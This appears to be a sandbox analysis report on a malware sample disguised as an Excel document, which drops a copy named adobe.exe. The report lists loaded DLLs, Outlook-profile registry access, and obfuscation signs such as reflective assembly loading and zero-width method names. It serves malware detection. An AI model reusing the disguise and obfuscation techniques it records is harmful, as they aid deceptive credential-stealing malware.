                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: slZY.pdb source: PRE ALERT Docs_PONBOM01577.xlsx.exe, adobe.exe.2.dr
                    Source: Binary string: slZY.pdbSHA256L source: PRE ALERT Docs_PONBOM01577.xlsx.exe, adobe.exe.2.dr

                    Data Obfuscation

                    barindex
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.2de85e8.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.2de85e8.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, c2nuaZ1j2jxTrWK6iR.cs.Net Code: tKWOIdEytW System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4de0000.6.raw.unpack, c2nuaZ1j2jxTrWK6iR.cs.Net Code: tKWOIdEytW System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.4a25980.2.raw.unpack, c2nuaZ1j2jxTrWK6iR.cs.Net Code: tKWOIdEytW System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.7be0000.8.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.7be0000.8.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                    Source: adobe.exe.2.dr, StringListEditor.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 3.2.adobe.exe.4043cd0.3.raw.unpack, c2nuaZ1j2jxTrWK6iR.cs.Net Code: tKWOIdEytW System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 0_2_01369C61 pushad ; iretd 0_2_01369C6D
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_069C9F31 pushfd ; iretd 2_2_069C9F32
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_069CBAB0 push es; ret 2_2_069CBAC0
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeCode function: 2_2_069C7952 push es; ret 2_2_069C7960
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_01499C40 pushad ; iretd 3_2_01499C6D
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_01499C21 pushad ; iretd 3_2_01499C6D
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_01060C55 push edi; retf 4_2_01060C7A
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 4_2_0688BB50 push es; ret 4_2_0688BB60
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_01279C40 pushad ; iretd 6_2_01279C6D
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 6_2_02B1D485 push FFFFFF8Bh; iretd 6_2_02B1D487
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_06697673 push es; ret 8_2_06697680
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exeStatic PE information: section name: .text entropy: 7.945017887436935
                    Source: adobe.exe.2.drStatic PE information: section name: .text entropy: 7.945017887436935
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, KJKWYe04ndXo1dLGx3.csHigh entropy of concatenated method names: 'BoO1VZ3yYZ', 'bZf13w2bGv', 'Muw1nTBUh2', 'qld18uYn3v', 'xic1ZvRaeo', 'cOn1QGCe3B', 'PJa17V3YuN', 'NT61smAoyN', 'PDk1bGayh1', 'hGx1G6TakJ'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, JIgtojd31oq0a8Ne66.csHigh entropy of concatenated method names: 'fBo7H6bu2o', 'BG17MHAIkt', 'ToString', 'vft7hQ0sWB', 'B847XV6Ftf', 'oZQ719mtPd', 'dy87SBe5EE', 'Ln37dc9MFb', 'qru7fwptEf', 'DPI7rI16GF'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, cYgM2iBJbIwf49iAyB.csHigh entropy of concatenated method names: 'JpIZJVMdmN', 'T4tZixUith', 'nLMZBAZBEL', 'eNgZeiJCcF', 'ErTZgnDjxw', 'cFuZucEK9a', 'oxdZ0DZtRo', 'FVBZ6Vuj3S', 'LCVZ4OrxBZ', 'DOIZT7BQfO'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, YIBjEUC2hYAeNNhpTX.csHigh entropy of concatenated method names: 'Dispose', 'JwoPNI70GU', 'QXJDgyodMG', 'T1tRRlfWiv', 'bqnPCBWfoI', 'NiAPzALTrw', 'ProcessDialogKey', 'BS7DWLDZI0', 'PwjDPVPySr', 'CN0DD82I3e'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, u0WLUiFmU62nf8wvh47.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UKLGBQHpdg', 'TuMGesqYuQ', 'zokGaY7PiQ', 'gpvGmOX0fD', 'b7YGAYCWv9', 'GMhGqfFUlP', 'RZdG5RTbgb'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, arCIwW2EHbpP4FTa9P.csHigh entropy of concatenated method names: 'YQ9bP1LGFV', 'jFtbcPGs1b', 'nv7bOMvOgk', 'MkIbhlUljB', 'rwnbXr95jl', 'HVmbS8lLqf', 'bIpbdwft5E', 'hyXs5a5PAR', 'Nv2sj19auZ', 'BiCsNtVcqS'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, KbE2EyPT6T9ZpExMle.csHigh entropy of concatenated method names: 'ToString', 'dSQQv7JoOT', 'Vu1QgLGjmo', 'XbUQutePo2', 'LP3Q0qH8eV', 'x80Q6sLK7x', 'eaIQ4vYth2', 'vlBQTxf70B', 'uYaQY2hXcM', 'OXsQKL0Bnc'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, EpHttsc5PRSC3qdCh0.csHigh entropy of concatenated method names: 'TaDSUA9o0g', 'SixSpF612C', 'Rkc1uEVDhb', 'ce4101dNwk', 'Qlt16mC0Mn', 'uMt14KQQtc', 'j6I1Tqs26R', 'zt51YW7cJF', 'y1K1KI8SIW', 'idE1JMyZrc'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, c2nuaZ1j2jxTrWK6iR.csHigh entropy of concatenated method names: 'MbicxpZ2iF', 'JuvchEhy8a', 'uXOcXbhS9N', 'QQ8c1B4lO2', 'MU5cSQc8hy', 'CwEcdg1ndQ', 'TxacfmwhGN', 'J97crMb2vj', 'EC2c2tX3Zx', 'WapcHvx2f5'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, tu8VtYjuLCMFEaI0Kd.csHigh entropy of concatenated method names: 'aNAfhsbeQA', 'UoBf12RayJ', 'EEdfdJXQ7P', 'o71dCZ3WBi', 'ecndzTPK3s', 'xHofWXUWvo', 'trmfPtxGBm', 'DaufDjjCpS', 'SIEfcmy6HR', 'uqlfOjnjXk'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, O9liTyGSgHOXubn0i8.csHigh entropy of concatenated method names: 'HQishiHRWB', 'PZasXxLYvU', 'Gwws181ICw', 'aOnsSSdRIu', 'B0Ysdwggw4', 'WvRsfN7ceT', 'OBIsrBt0iK', 'wl5s2xhcHe', 'MMfsHfRpvH', 'bhDsMBYxIU'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, MW4t0FZVT9Flwx07F2.csHigh entropy of concatenated method names: 'jKmPfj3Zwa', 'TaCPrOI7mq', 'yjYPH7Wcjj', 'ulBPMllnPr', 'PKHPZvvWyr', 'nP0PQQnG5l', 'f1RXY0xkuhabvDSNLZ', 'xkE2kPXe5CJUGkmRWn', 'Lv5PPQGMPR', 'nh7PcE3Gqk'
                    Source: 0.2.PRE ALERT Docs_PONBOM01577.xlsx.exe.49a8960.4.raw.unpack, JKi31c4KTy182hEMiH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rGjDNNgBFF', 'SyDDCYKoCw', 'AouDzPOKth', 'SUncWnHE9k', 'jjLcPWdNNW', 'AN1cD79LKr', 'NY3ccAJYqr', 'Mop9wOvR3GhBV8GFaeK'
